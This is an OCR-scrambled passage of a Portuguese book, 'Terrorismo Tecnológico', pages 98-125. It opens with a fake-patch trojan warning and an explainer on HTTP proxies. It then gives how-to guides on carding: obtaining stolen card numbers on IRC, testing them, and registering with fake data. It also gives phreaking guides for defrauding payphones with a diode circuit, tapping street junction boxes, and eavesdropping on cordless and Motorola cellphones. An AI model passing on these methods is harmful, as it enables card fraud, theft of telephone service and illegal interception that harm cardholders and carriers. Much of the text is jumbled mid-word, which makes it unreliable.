E-mails RECOMENDANDO INSTALAÇÃO DE "ARQUIVO DE CORREÇÃO" DE SISTEMAS OPERACIONAIS
O e-mail traz a identificação de remetente inexistente. Além dis
Caso você receba um e sas características, não efetue o download do arquivo, pois se trata de "cavalo-de-tróia", programa de computador que, uma vez executado, dentre outros danos à sua máquina, pode capturar seus dados de acesso ao ba
nexados sem verificá-los com antivírus atualizado, mesmo que o conteúdo seja criado pela pessoa de sua confiança qu los-de-tróia, sem que os remetentes sequer saibam disso.
esso ao seu banco via Internet, por exemplo, certifique-se de estar navegando em site seguro, pela exi ia de um pequeno cadeado fechado na parte inferior do programa de navegação. Note também que no início do campo "endereço” surge às letras "https".
Diversos usuários da Internet têm recebido nos últimos dias, uma mensagem que recomenda a instalação de um suposto "pacote de correções" para os sistemas operacionais Windows XP, 2000 e NT.
so, a mensagem que recomenda a imediata instalação da suposta "correção", por meio do download do aplicativo "patch_2002.exe" passa a impressão de ser de autoria da companhia fabricante daqueles sistemas operacionais, o que não é verdade.
-mail com es
nco pela Internet.
Como medida preventiva de segurança é recomendável evitar abrir e-mail de origem desconhecida ou executar programas / abrir arquivos a
e os enviou. Eles podem conter vírus ou cava
No caso específico de ac
stênc
Terrorismo Tecnológico Aprenda Para Sobreviver
98
4.7 Dicas
sem assinaturas eletrônicas para a autenticidade dos e-mails.
Utilize uma criptografia para o caso de alguém roubar informações, assim apesar de telas não conseguirão saber o seu conteúdo.
Extra
U
Troque de senha pelo menos a cada um mês.
Siga as recomendações se mudanças de senhas que estão no capítulo referente a senhas.
(retirado da Internet)
Introdução
Os proxies são principalmente usados para permitir acesso à
Web através de um firewall (fig. 1). Um Proxy é um servidor HTTP especial que tipicamente roda em uma máquina firewall. O Proxy espera por uma requisição de dentro do firewall, a repassa para o servidor remoto d ta e envia de volta
o outro lado do firewall, lê a respos ao cliente.
Terrorismo Tecnológico Aprenda Para Sobreviver
99
Figura 1: Visão geral de um Proxy
O Proxy está rodando ou em um servidor firewall ou qualquer outro servidor interno que tenha acesso total a Internet - ou em
uma máquina dentro do firewall fazendo conexões com o mundo exterior através de SOCKS ou qualquer outro software firewall. Normalm lientes
em uma s aching eficiente de todos os documentos requisitados.
já t
.
ente, o mesmo Proxy é usado por todos os cub-rede. Isto torna possível para ele fazer c
A habilidade que o Proxy tem no uso do cache, o torna atrativo
para aqueles que não estão dentro do firewall. Configurar um ser idor Proxy é fácil e os mais populares programas clientes Web v
em suporte a essa ferramenta. Sendo assim, torna-se simples a tarefa de configurar um grupo de trabalho inteiro para usar o serviço de cache do Proxy. Isto reduz os custos com tráfego de rede porque muitos documentos que são requisitados são lidos do cache local
A metodologia atual é baseada em um código de gateway
escrito por Tim Berners-Lee como parte do libwww (WWW
Terrorismo Tecnológico Aprenda Para Sobreviver
100
commom Library). Kevin Altis, Ari Luotonen e Lou Montulli foram os principais contribuidores para a padronização do Proxy. Lou Montulli, autor de Lynx, fez as primeiras mudanças no libwww em colaboração com Kevin Altis. Ari Luotonen mantém o CERN httpd.
ível de aplicação Proxy faz um firewall seguramente permeável para os usuários na organização sem criar um furo na seg
Porque um nível de aplicação Proxy?
Um n
urança onde hackers poderiam entrar na rede da organização. Para clientes Web, as modificações necessárias para suportar
um nível de aplicação Proxy são menores (leva-se apenas 5 minutos para adicionar suporte Proxy para o Emacs Web Browser).
Não há necessidade de compilar versões especiais de clientes
Web com bibliotecas firewall, o cliente "out-of-the-box" pode ser configurado para ser um cliente Proxy. Em outras palavras, quando se usa Proxy não necessitamos customizar cada cliente para suportar um tipo ou método especial de firewall: o Proxy, em si, é um método padrão para acessar firewalls.
Usuários não têm que ter clientes FTP, Gopher e WAIS
separados (muito menos modificados) para acessar um firewall - um simples cliente Web com um servidor Proxy trata todos esse cas
ra suportar cada protocolo e se concentrem em coisas mais importantes - é po
protocolos são manuseados transparentemente pelo Proxy.
os. O Proxy também padroniza a aparência de clientes Gopher e FTP.
O Proxy permite que os programadores esqueçam as dezenas
de milhares de linhas de código necessárias pa
ssível ter clientes "peso-leve" que somente compreendam HTTP (nenhum suporte nativo aos protocolos FTP, Gopher, etc) - outros
Terrorismo Tecnológico Aprenda Para Sobreviver
101
Usando HTTP entre o cliente e o Proxy, nenhuma funcionalidade é perdida, pois FTP, Gopher e outros protocolos Web são bem ma
a acessar a Internet contanto que o Proxy seja visível tanto para a rede particular como para a Internet.
peados para o HTTP. Clientes sem DNS (Domain Name Service) também podem
usar a Web. O endereço IP do Proxy é a única informação realmente necessária. Organizações usando endereços, por exemplo, classe A (como 10.*.*.*), em suas redes particulares podem aind
Proxy permite um alto nível de log das transações de clientes,
incluindo endereço IP, data e hora, URL, contagem de bytes e código de acesso. Qualquer campo (seja de meta-informação, ou seja, comum) em uma transação HTTP é um candidato para log. Isto não é possível com log no nível IP ou TCP.
Também é possível fazer a filtragem de transações de clientes
no nível do protocolo de aplicação. O Proxy pode controlar o acesso a serviços por métodos individuais, servidores e domínios, etc
mente uma cópia é guardada, como também permite um uso de "cache inteligente", onde os documentos freqüentemente referenciados por muitos clientes são guardados por um pe empo pelo cache manager.
. Outra feature interessante do Proxy é a cache. O uso de cache
é mais efetivo no servidor Proxy do que em cada cliente. Isto salva espaço em disco, desde que so
ríodo mais longo de t
O uso de cache também torna possível acessar algumas
páginas mesmo que servidores estejam fora do ar. Essa facilidade torna o serviço melhor, visto que recursos remotos como um site FTP ocupado que são freqüentemente inacessíveis remotamente podem ser agora acessíveis através do cache local. Pode-se citar uma infinidade de usos que podemos fazer com o cache: fazer uma demonstração de algum lugar com uma baixa velocidade de
Terrorismo Tecnológico Aprenda Para Sobreviver
102
conexão, ler documentos com a máquina não-conectada (ob s documentos no cache local), etc.
para usar ver ões de firewalls em seus códigos. O Proxy é mais simples para configurar do que SOCKS e trabalha em todas as plataformas, não somente UNIX.
Detalhes Técnicos
servidor pega ve" da URL requisitada (Fig. 2); outras partes, como o especificador de protocolo "http:" e o nome do servidor são obviamente claros para o
viamente após colocar todo Em geral, autores de clientes Web não têm razão s
Quando uma requisição HTTP normal é feita por um cliente, o somente o path e a "porção cha
servidor HTTP remoto. O path requisitado especifica um documento ou um script CGI no sistema de arquivos local do servidor; ou ainda algum outro recurso disponível daquele servidor.
Quando um usuário entra:
ils.html
http://mycompany.com/information/ProxyDetails.html O browser converte para: GET /information/ProxyDeta
Terrorismo Tecnológico Aprenda Para Sobreviver
103
Figura 2: Uma transação HTTP normal
O cliente faz a requisição ao servidor HTTP especificando apenas o recurso relativo àquele servidor (nenhum protocolo ou
nome de servidor é colocado na URL). Quando um cliente envia uma mensagem para um servidor
Proxy a situa pre usa HTTP m r
ntretanto, ao o pathname e possíveis palavras que complementariam a procura para o Proxy (como ocorre em uma requisição normal), todo a URL é sp cificada (fig.3 e 4). Desta forma o Proxy tem todas as formações nec a o servidor
remo
ttp://mycompany.com/information/ProxyDetails.html
ção é um pouco diferente. O cliente sempara transações com o Proxy, mesmo quando acessa u
ecurso oferecido por um servidor remoto usando outro protocolo, como Gopher e FTP.
invés de especificar somenteE
ein
eessárias para fazer a requisição par
to especificado na URL. Nada melhor que um exemplo para clarear as coisas: se o
usuário digitasse a seguinte URL: h O browser, sabendo da existência do Proxy, convertería para a
seguinte requisição:
Terrorismo Tecnológico Aprenda Para Sobreviver
104
GET http://mycompany.com/information/ProxyDetails.html O browser conecta-se então ao servidor e o Proxy providencia
a conexão com a Internet. Nesse caso, o Proxy convertería a requisição para:
ET /information/ProxyDetails.html G
Figura 3: Uma transação HTTP com Proxy.
O cliente faz uma requisição ao Proxy usando HTTP mas especificando toda a URL; o Proxy se conecta ao servidor remoto
e pede o recurso relativo àquele servidor sem especificar protocolo ou o nome do servidor na URL
Terrorismo Tecnológico Aprenda Para Sobreviver
105
Figura 4: Transação FTP com Proxy.
O cliente faz a requisição ao Proxy usando HTTP (embora o recurso seja um FTP). O Proxy analisa a URL recebida e percebe que deve abrir uma conexão FTP. O resultado (o arquivo, no caso)
é enviado para o cliente usando HTTP
age como um cliente para conseguir o documento: ele chama o mesmo protocolo libwww que um cliente deveria chamar para que o documento fosse obtido. Entretanto, a "apresentação" do documento no Proxy é através de HTTP, independente do protocolo que foi usado para consegui-lo. Um comando list, por mo um documento HTML.
Deste ponto o Proxy
exemplo, é retornado co
Terrorismo Tecnológico Aprenda Para Sobreviver
106
Capítulo V
Carders e Phreackers-
Use o somente para estudos.
Os textos a seguir foram obtidos pela web. São exclusivamente para entender a facilidade de ser um carder ou um phreacker. Qualquer utilização do material para outro fim que não seja um estudo cientifico não será de responsabilidade do autor. A utilizaçao do material como manual para uso é considerado crime.
Terrorismo Tecnológico Aprenda Para Sobreviver
107
O carder
5.1 Como Funciona:
s cartões de crédito são totalmente verdadeiros. Veja bem. Você ai a um restaurante e paga com seu cartão. Certo ? Bem, logo eus dados são enviados a agenciadora do seu cartão, via modem,
então, mais dificil char os Crakers que pegam os cartões. Uma vez distribuídas no C às informações obtidas sem autorização (invasão) sobre os
artões. são passadas para os Carders, por sistema de troca, a conta Shell (conta especial em Linux ou Unix).
ada usuário carder vai usar o cartão em um ponto diferente do undo.
sabe nenhuma transação é segura na WEB. Quando se z compras on line, as páginas oferecem a opção de compra pelo ECURE SERVER, isto é, eles garantem que transação está sendo ita somente entre a sua máquina e a do servidor, pois todos os
Ovspela aquela maquininha, ou por telefone. Depois que seu cartão fora debitado na agenciadora. ai entram os Carders. Eles invadem o sistema, pegam todos os arquivos de cc (credit card). e distribuem no IRC ( International Relay Chat) para tornar,aIRcgeralmente umCm
5.2 Obtenção de cartões. Como você faSfedados estão sendo codificados. Isso não garante nada!.
Terrorismo Tecnológico Aprenda Para Sobreviver
108
Mesmo que nenhum hacker consiga decodificá-la, isso não impede vidor da página e consiga o arquivo que
ontenha os dados dos clientes.
simples: no IRC, existem canais específicos, são os canais ackers, é só fazer amizade e pedir o número de um cartão.
xistem canais no IRC específicos falando sobre carders, #carders -
ndo russos, americanos, brasileiros, e tudo mais : ) visite: ttp://www.klan.carder.com
que se entre no serc A outra opção menos trabalhosa, é simplesmente PEDIR!!! Éh
E#cc - #carding - #mastercard - #passw. A EFNET é mais visada,teh . #carder Brasnet - #cader Efenet -
carder Brasirc
rdear!
Antes de tudo páginas de ompras, ou na maioria delas, paginas de registro de shareware que ocê deve preencher o cadastro* como se fosse registrar um soft eu e nisso ela dirá se o cartão é válido ou não.
Cadastro.
#
5.3 Como Ca
você deve testar os cartões. Existemcvs *O
Terrorismo Tecnológico Aprenda Para Sobreviver
109
Quando você for se cadastrar, você deve preencher todos os
erdadeira é o e-mail* pra contato.
E-mail.
bém não deve ser o do seu do provedor, você deve sar o e-mail de páginas que fornecem o e-mail gratuito tipo:
astreamento de IP.
uando você prenche os dados em páginas de cadastrador, seu ndereço IP é rastreado pela página, ou seja, eles podem te calizar pelo seu provedor de acesso mas pode ser usado técnicas e anonimidade.
que geralmente é cardeado.
odem ser usadas de diversas maneiras:
campos com informações falsas, ou seja, o endereço..tel..etc, pois você não quer ver o sol nascer quadrado né??. A única informação que deve ser v *O O e-mail tamuHotmail , Starmedia etc. R Qelod
O Suas habilidades carders p
Terrorismo Tecnológico Aprenda Para Sobreviver
110
Você pode fazer inscrição em home pages que dão acesso
a maioria páginas pornos, onde o acesso permitido com o pagamento mediante cartão de
m ser
rdear algo concreto
e
Você tem que estar certo que o cartão é válido!!!!!
2- Use de preferência cartão estra o, evite cartões brasileiros. (3- Se você for cardear alguma coisa cara, use cartões American Express e Visa Go há perigo de não
r crédito :-)
ne revistas nacionais, cardeie as ericanas, levam +ou- uns 20 dias para chegar. Uma dica port
eios, para receber
sas revistas ( custa R$ 54,18 por 1 ano).
exclusivo para usuários, nao conteúdo só éCrédito. LEMBRE-SE: As informações do cadastro devefalsificadas, menos o cartão, é claro.
5.4 Como ca Sem dúvida a glória de um Carder é cardear alguma coisa, dpreferência um computador para conseguir tais proezas énecessário: 1-
ngeir
ld, pois o limite e grande e não te 4- Não cometa o erro de cardear alguma coisa cara parcelado, ou seja, compre tudo à vista!!! 5- Se você for cardear assinaturas de revistas (registramos casos esse tipo também), não assid
amIm ante:
Se você puder alugue uma caixa postal nos corres
Terrorismo Tecnológico Aprenda Para Sobreviver
111
Pronto você já pode se divertir como um CARDER !!!!!!!
5.5 Phreacker (Telefonia) Indice
A1. Introdução A1.1. Prefacio da vA1.2. Pobreza de informações e pessoas mal informadas A2. Telefones privad
2.1. Introdução
o um diodo 3.3. Efetuando ligações gratuitamente utilizando um aparelho m
3.
ersão
os AA2.2. Efetuando ligações de aparelhos sem teclas A3. Telefones públicos A3.1. Introdução
3.2. Efetuando ligações gratuitamente utilizandAAco um
4. Conectando notebooks a telefones públicos AA3.5. Observação A4. Caixas de verificação A4.1. Introdução A4.2. Efetuando ligações gratuitas de caixas de verificação A5. FAQ A5.1. E possível tomar um choque mexendo em fios telefônicos? A5.2. Como faço para fazer chamadas grátis de minha residência? A6. Observação final
Terrorismo Tecnológico Aprenda Para Sobreviver
112
A1. Introdução
A1.1. Prefacio da versão
Depois da primeira versão deste manual recebi dezenas de mensagens, principalmente do pessoal do BHC (Brazilian Hackers Club), com varias perguntas. Algumas se tornaram adendos e complemento para as seções e outras eu levei para uma Mini-FAQ, que esta localizada na seção 5.
A1.2. Pobreza de informações e pessoas mal informadas
Ao me deparar com alguns textos do gênero, senti-me decepcionado ao perce tos e fracos, quando o
sunto em questão er ambém perceber que
inado ueles que se rasgam de ler textos americanos de phreaking e
tnão permite o "boxing". Maiore s na seção 5.
ber que eram incomplea a telefonia. E triste tas
pessoas mal informadas e sem conhecimento técnico (embora tenham boa vontade), assinam estes textos. Faço aqui um tutorial com material bastante útil, que explica muitas coisas que podem ser feitas com a intenção de buscar um pouco de liberdade para se utilizar os sistemas telefônicos. Este texto também e destaqboxing. Não importa o que o fulano ouviu dizer que dava, o sistema elefônico nacional e completamente diferente do usado nos EUA, e
s detalhe
Terrorismo Tecnológico Aprenda Para Sobreviver
113
A2. Telefones privados
A2.1. Introdução Nesta seção, explicarei o processo (bem simples) de se efetuar ligações a partir de telefones sem teclas ou com cadeado, muito omuns em empresas e ambientes de trabalho. c
A2.2. Efetuando ligações de aparelhos sem teclas
tes de começarmos, precisamos definir o que significa "duração esmente uma interrupção no fluxo a telefônica, e a sua duração e
endida como o espaço de tempo decorrido do inicio ao fim desta sos enviados pelo aparelho telefônico quando de algum número, são iguais ao sinal emitido
ncho. A diferenciação e feita ia a duração do pulso.
maior do que 0.5 segundos (aumentar um a as linhas mais antigas), a central considera
edido de linha. Se a duração do pulso for menor do que
úmeros de 0 a 9, e enviada uma s pulsos em seqüência referentes ao número, ou para o número 2, três para o número 3 e assim por
nte. Para o número zero são enviados dez pulsos. Para simular es pulsos sem a necessidade de teclas, basta usar o botão onde
"pega" a linha, aquele onde você coloca o telefone em cima
Ande um pulso". Um pulso e simpl
corrente que circula na linhdeentinterrupção. Os pul
botãovocê aperta oquando você coloca o telefone no ga
central telefônica, usando como referencpela Se ele for um pouco
e valor parpouco esse e um pqu
esse valor, a central ira considerar que o número a ser discado esta ndo enviado. Para formar os nse
série de pequenoja, dois pulsos se
diasse
sequando quer terminar uma ligação. Aperte e solte este botão rapidamente de acordo com o número que você quer discar, espere um pouco e aperte outra série de vezes de acordo com o outro número. Lembre-se que para o número zero deve-se apertar o botão dez vezes. Faça isso com todos os números e, ao final, você escutara o tom de chamada.
Terrorismo Tecnológico Aprenda Para Sobreviver
114
A3. Telefones publicos
A3.1. Introdução Nesta seção explicaremos alguns métodos que hackers usam para efetuar ligações com telefones públicos sem a necessidade de se gastar fichas. Mostraremos também como ligar notebooks a telefones públicos (se e que existe um hacker que não saiba). A3.2. Efetuando ligações gratuitamente utilizando um
diodo O diodo e um componente eletrônico que possui diversas utilizações. Podemos resumir seu funcionamento basicamente na seguinte síntese: Um diodo (ou junção PN) permite que a corrente circule em apenas uma direção dentro de um circuito. Ao se utilizá-lo para o fim aqui desejado, vamos precisar de um diodo IN4002, IN4004 ou IN4007. Estes podem ser encontrados facilmente em qualquer casa de componentes eletrônicos. Vamos precisar também de um resistor com valor nominal de 22K e potencia de 1W. Basta
e você ligue o diodo em paralelo com o resistor (confqu orme tenta ostrar a ilustração abaixo) e, em seguida, descasque os fios do lefone e ligue cada uma das pontas obtidas com o diodo e o
o
| / diodo \ |
mteresistor neles. Lembre-se: você vai apenas descascar os fios do relhão! Se você cortá-los, ele vai ficar sem linha.
| | | | | | | | +------------------++------------------+ | | | | +----¦ ¦ ¦ ¦ ¦ ¦ ¦----+ | |
">
Terrorismo Tecnológico Aprenda Para Sobreviver
115
ponta +_-----------+ +-----------_+ ponta | \ / | | +--
esistor |
eira errada, o orelhão vai ficar sem linha. Uma dica ssoal: os telefones de cabine e os de cartão são mais fáceis de rem violados. Alguns orelhões comuns tem uma proteção
lindada que impede o nico. Embora mesmo sim seja possível puxar o fio com
onar. Mesmo se você não achar nenhuma
---¦ ¦ ¦ ¦ ¦ ¦ ¦-----+ | | r| | +------------------++------------------+ | | | | fio do telefone | | | | Para executar esta tarefa, eu aconselho que você descasque os fios dos orelhões que você utiliza com mais freqüência, pois, devido ao fato dos fios do telefone publico serem muito grossos, não e um trabalho que se possa fazer tranqüilamente e rapidamente sem ser notado. Você devera observar também a polarização correta a ser utilizada. Você percebera isso facilmente, pois, quando você ligar o
odo de mandipeseb acesso ao cabo telefô
um gancho, que você enfiara do aslado esquerdo do aparelho telefônico, entre o telefone e uma grade preta de sustentação que fica atrás dele, eu aconselho que você evite esses tipos. Vamos voltar um pouco para a parte técnica da coisa. O diodo que estamos utilizando vai funcionar da seguinte maneira: Quando uma ligação e completada de um telefone publico, a central inverte a polarização do telefone de -48 para 48 volts. Quando o aparelho telefônico percebe isso, ele pede uma fixa. E ai que entra em funcionamento o nosso querido diodo. Ele permite que a tensão caia ate 0 volts, mas não permite que ela se torne positiva. Dessa forma, o orelhão não vai pedir a ficha. Nesse caso o resistor esta funcionando apenas como um dissipador de potencia, para que você não de o azar de queimar o diodo (não que ele seja caro, e que em algumas localidades ele pode ser uma peça rara que custa
$0,10) e ficar sem telefR
Terrorismo Tecnológico Aprenda Para Sobreviver
116
loja que venda, pegue uma placa de algum circuito eletrônico antigo alguma coisa que tenha queimado. Elas sempre tem diodos.
Você deve procura m dois terminais, e preta e normalmente estará escrito IN qualquer coisa.
lefones públicos
processo para se conectar notebooks a orelhões e igual ao de se cone as considerações a respeito notebook, que segue os
drões da FCC Americana e é um pouco diferente da nossa. O
esta tudo OK.
der uma peça pequenininha que te
A3.3. Efetuando ligações gratuitamente utilizando um
aparelho comum Primeiro você deve tomar os processos citados anteriormente para descascar os fios do telefone. Em seguida você deve conseguir um aparelho telefônico comum e ligar cada uma das pontas dos fios dele nos fios do orelhão. Para facilitar sua vida, eu aconselho que o seu telefone seja o menor possível e que você prenda um jacaré (pequeno gancho achado em qualquer loja de componentes eletrônicos) em cada uma das pontas do seu telefone, para facilitar a ligação no orelhão. Ai e só efetuar a ligação normalmente.
A3.4. Conectando notebooks a te
O
ctar telefones comuns. Resumirei nesse item algumda fiação do
paconector do fio do notebook, que e do tipo Jack, tem quatro fios dentro dele. Arranque o conector de plástico transparente que fica na ponta do fio, pegue os dois fios centrais e separe-os dos fios das extremidades. Estes dois fios centrais são os que serão utilizados para fazer a ligação no orelhão. Eu aconselho que você coloque jacarés neles também. Basta conectar-se a BBS's da mesma forma que você se conecta em casa. Caso você queira testar se esta tudo OK, abra um programa de terminal qualquer e digite o comando ATA, se fizer um barulhinho parecido com o tom de linha e porque
Terrorismo Tecnológico Aprenda Para Sobreviver
117
A3.5. Observação
As chamadas telefônicas se dividem em três categorias: locais, DDD regionais e interurbanas (ou nac nais). As chamadas locais são aq ligações feitas dentro do co onde você mora, no caso
São Paulo, as chamada las feitas para
A4. Caixas de verificação
A4.1. Introdução
ão em forma de triangulo, que alquer chaveiro conhecido pode fazer. Lembre-se que um
, não é um vândalo. Não vá arrombar a porra da caixa.
iouelas efetuadas dentro de sua cidade, as DDD regionais são as
mplexo urbano s DDD regionais são aquede
as cidades que fazem parte da Grande São Paulo: Jundiaí, Santo André, São Bernardo, etc. As chamadas interurbanas são aquelas feitas para fora do complexo urbano onde você esta localizado. Usando São Paulo como exemplo, podemos citar o interior do estado de São Paulo e cidades localizadas em outros estados. Os telefones comuns efetuam chamadas locais e DDD regionais, e os telefones DDD efetuam chamadas interurbanas, ou seja, para qualquer lugar do Brasil.
As caixas de verificação (ou armários na linguagem "técnica" da TELESP) são caixas de ferro, que geralmente ficam localizadas em vias publicas, e são utilizadas para se fazer a checagem das linhas do sistema e identificar problemas antes de se enfiar no subsolo para tentar resolvê-los. Tais caixas costumam ser da cor cinza e tem cerca de 1,5 m de altura, com um código em preto escrito na parte superior. Elas possuem um grande número de fios telefônicos, todos eles divididos em pares. Tais caixas podem ser facilmente abertas (se e que a que você achar já não estiver arrombada), pois
ralmente possuem uma tranca padrgequphreacker
Terrorismo Tecnológico Aprenda Para Sobreviver
118
Isto e coisa pra quem não tem cérebro. Mesmo se ela estiver ncada com um cadeado, se não puder abrir um cadeado ou
ocurar informação de um método para abri-lo, procure outra caixa. Ou então esqueça qu
de caixas de verificação
ara se efetuar uma ligação de dentro destas caixas, basta que cê pegue um dos diversos pares de fios que se encontram lá ntro e ligue eles ao seu pequeno telefone comum portátil ou a um tebook. Não esqueça de por os fios que você tirou de volta no
gar para que nem o pessoal da manutenção e nem o dono da nha percebam. Como essas caixas de verificação costumam se
situar em vias bem tipo de ligação e saconselhada. Mas, como toda a regra tem sua exceção, fica aqui
ais uma informação para você. Vale lembrar que de caixas de rificação pode-se efetuar telefonemas para qualquer lugar,
clusive chamadas internacionais.
xendo em fios
ssuem uma tensão ficiente para dar choque relativamente forte em uma pessoa. Este lor de tensão pode atingir um patamar em que ele pode dar um rdadeiro coice na pessoa, no momento em que a linha envia o
p
tom que legal. Se você estiver
trapr
e você leu esta seção.
A4.2. Efetuando ligações gratuitas
Pvodenoluli
movimentadas, a pratica desse demvein
A5. FAQ
A5.1. E possível tomar um choque metelefônicos?
omo descrito no item 1.3, os fios telefônicos poC
suvavesinal para o telefone tocar. Isto depende muito da situação e da
essoa. Se você estiver com a mão no orelhão e mexer nos fios,ar um chovocê provavelmente vai
Terrorismo Tecnológico Aprenda Para Sobreviver
119
acabado de comer algo salgado, provavelmente este choque será ainda mais forte, pois o sal aumenta a condutividade do seu corpo. A5.2. Como faço para fazer chamadas grátis de minha
residência? Quando você efetua uma chamada, a central telefônica identifica de onde você esta discando, identifica qual o tipo de telefone que você esta usando (publico ou residencial), e então ela arquiva pra onde esta sendo feita a ligação e toma as providencias necessárias com
lação à cobrança. Essa identificação e feita na fonte e não por um nal enviado pelo seu telefone. Desse modo, e praticamente possível pra você que esta na sua residência, tentar driblar essa
tari al PABX.
resiim
farão. Imagine que sua linha telefônica não passa de um ramde
A6. Observação Final Todo o processo aqui descrito não causa nenhum tipo de dano aos aparelhos telefônicos, mesmo em longo prazo.
5.6 Telefones Particulares
Terrorismo Tecnológico Aprenda Para Sobreviver
120
diceÍn
r para o Disk-Amizade sem pagar 4. Ligando a cobrar mais barato 5. Escutando conversas telefônicas através de telefone sem fio 6. Efetuando ligações de telefones sem teclas
ar, entenda que isso e apenas o seu entretenimento. cas
a ligação dentro da sua casa. Os lefones em questão são telefones sem fio. Eles transmitem suas das por FM. Sendo assim, o que você tem que fazer e descobrir a qüência. Porém, ha suas restrições. A menos que seja um radio
com do lefone. Uma freqüência que descobri e 93,9 MHz, mas não quer
B1. Como escutar ligações com um aparelho de radio comum B2. Fraudando orelhões com um aparelho comum B3. Como ligaBBB
B1. Como escutar ligações com um aparelho de radio
comum Para começPor isso, não daremos dicas de como escutar ligações telefônido seu vizinho. Se o que você quer e isso, nem comece a ler. O que será ensinado e escutar umteonfre
uma antena muito forte, ele tem que ficar perto da basetedizer que todas sejam assim. E não e apenas ligar o radio e escutar. Leva-se um tempinho para poder sintonizar. Mas depois de sintonizada no ponto exato, você poderá escutar perfeitamente.
B2. Fraudando orelhões com um aparelho comum Modo de fraude com telefone comum a orelhões públicos: Primeiro você deve arrumar um telefone comum bem pequeno e compacto.
Terrorismo Tecnológico Aprenda Para Sobreviver
121
Depois você tem que descascar os fios dele (vão dar em 2 fios). Então arrume um bom alicate, estilete ou faca e vá ate um orelhão. Descasque os fios do orelhão (descasque, não e para cortar) pegue os dois fios descascados do orelhão e entrelace com os dois fios do seu telefone, observe a polarização, ou seja, se seu telefone portátil
ar sem linha inverta a posição dos fios telefônicos, pois, ao
B4. rato
ara ligar a cobrar mais barato, você tem que adicionar um número e a soma dele com o ultimo seja igual a 10. Ex: A soma desses meros tem que dar 10. Como fazer: 9 011 5584-0352 + 8 = 9 011 84-03528.
ravés de
que isso aconteça, você tem que tirar o ansformador" (não sei se e esse o nome), e um retângulo que rmalmente e preto, igual ao de um vídeo game. passo - Ligar o telefone! Ele tem que ficar fazendo uns barulhos tranhos!
ficcontrario do que muita gente pensa, o orelhão tem fio negativo e positivo. Agora e só efetuar a ligação de seu telefone comum.
B3. Como ligar para o Disk-Amizade sem pagar Pessoas de São Paulo tem acesso ao Disk-Amizade, o único problema e que e pago, para ligar de graça apenas disque um 5 a mais, que ficara 1455, desse modo sua ligação não cairá na lista telefônica.
Ligando a cobrar mais ba Pqunú55
B5. Escutando conversas telefônicas atlefone sem fio te
° passo - Para 1
"trno2ºes
Terrorismo Tecnológico Aprenda Para Sobreviver
122
3º passo - Pegar ele r de sua casa. : Isso só funciona algumas vezes! Lembre-se que não sou
ntes de começarmos, precisamos definir o que significa "duração um pulso". Um pulso e simplesmente uma interrupção no fluxo corrente que circula na linha telefônica, e a sua duração e
entendida com ao fim desta terrupção.
e 0.5 segundos (aumentar um pouco esse lor para as linhas mais antigas), a central considera que e um dido de linha. Se a duração do pulso for menor do que esse valor,
a ce ndo viado.
e apidamente de acordo com o número que você quer discar,
pere um pouco e aperte outra série de vezes de acordo com o número zero deve-se apertar o
e, ao final, você escutara o tom de chamada.
e sintonizá-lo no melhor lugapsresponsável pelos seus atos!
B6. Efetuando ligações de telefones sem teclas Adede
o o espaço de tempo decorrido do inicioin Os pulsos enviados pelo aparelho telefônico quando você aperta o botão de algum número, são iguais ao sinal emitido quando você coloca o telefone no gancho. A diferenciação e feita pela central telefônica, usando como referencia a duração do pulso. Se ele for um pouco maior do quvape
ntral ira considerar que um número a ser discado esta seen Para formar os números de 0 a 9, são enviados uma série de pequenos pulsos em seqüência referentes ao número, ou seja, dois pulsos para o número 2, três para o número 3 e assim por diante. Para o número zero são enviados dez pulsos. Para simular esses pulsos sem a necessidade de teclas, basta usar o botão onde se "pega" a linha, aquele onde você coloca o telefone
cima quando quer terminar uma ligação. Aperte e solte estembotão resoutro número. Lembre-se que para o botão dez vezes. Faça isso com todos os números
Terrorismo Tecnológico Aprenda Para Sobreviver
123
5.7 Telefones Celulares
Índice C1. Burlando celulares C2. Ouvindo escuta de celulares C3. Fazendo escutas com o PT 550 da Motorola C4. Escuta celular via TV C5. Escuta celular
C1. Burlando celulares Primeiro, pegue o número que você vai discar. Ex: 123-4567. Esse número e fictício, não saia ligando para lá para pedir informações. Então devemos pegar o ultimo número do telefone a ser discado, no caso o 7... Então subtraímo-lo de 10, o que vai resultar o número 3. Somente vamos acrescentar o número 3 ao final do número discado. O resultado vai ficar: número ligado sem pagar: 123-4567-3
C2. Ouvindo escuta de celulares
rimeiro retire a bateria do seu celular; depois de abrir o celular, Pterão umas partes de metal embaixo dele, como três riscos de metal ||| , pegue um pedaço de papel alumínio e bote nos riscos de metal, depois bote a bateria e ligue o celular, irão acontecer algumas coisas, digite #1008# e depois de digitar o número e só ouvir as conversas telefônicas.
Terrorismo Tecnológico Aprenda Para Sobreviver
124
C3. Fazendo escutas com o PT 550 da Motorola O sistema de telefonia celular e altamente vulnerável ao phreaking. E simples fazer escutas telefônicas e outras coisas, como clonagem de telefones para se efetuar ligações gratuitas, etc. Se você dúvida, pegue um celular como o famoso e númeroso PT-550 da Motorola. Tire a bateria do celular e note que ha três encaixes metálicos atrás do aparelho. Coloque um pedaço de papel laminado no encaixe do meio e recoloque a bateria. Ligue o telefone (ele esta agora no modo de programação) e digite: # 08 # 11 XXXX # Onde:
8 - Liga o áudio de RX (Receptor) #11 - Ajusta canal de funcionamento do transceptor
XXX - número do canal (aconselho a você tentar números abaixo
#0
Xde 800) Exemplo: #08#11567# Tente varias vezes ate encontrar um canal onde haja conversa. Percebeu? Você esta fazendo uma escuta em um telefone celular. Não requer pratica nem tão pouco habilidade. Vale lembrar que se algum policial te pegar, você pode ir a cana. Ha também maneiras de se fazer clonagem, isto e, fazer o seu telefone celular usar a linha de outra pessoa. Eu particularmente nunca tentei, mas se você quiser por sua pele a risco, procure pelo Motorola Bebe, ou outros tantos textos existentes por ai. Falando de maneira simples, um celular e um radio-transmissor que trabalha com freqüências na faixa de 800 MHz, e que e capaz de alternar entre canais ao receber comandos de um computador conhecido como Central Switch, que controla o sistema telefônico móvel. Pode-se dizer que um aparelho celular e dividido em duas partes: O Transceiver (Transmissor/Receptor) e a cabeça de comando. Entende-se por cabeça de comando o teclado e seu circuitos de comandos, a NAM e a ESN. A NAM e um chip de PROM (Programable Read Only
Terrorismo Tecnológico Aprenda Para Sobreviver
125
Memory) que contem informações sobre o funcionamento do celular, como número, área, etc. Já a ESN (Eletronic Serial Number) e um chip de ROM (Read Only Memory) que armazena um número, geralmente de 11 dígitos octais, referentes a um número de série único para cada telefone. Existem alguns modelos de celulares que tem as suas NAMs reprogramaveis pelo próprio teclado do celular. Outros necessitam que se ligue o celular a computadores.
C4. Escuta celular via TV
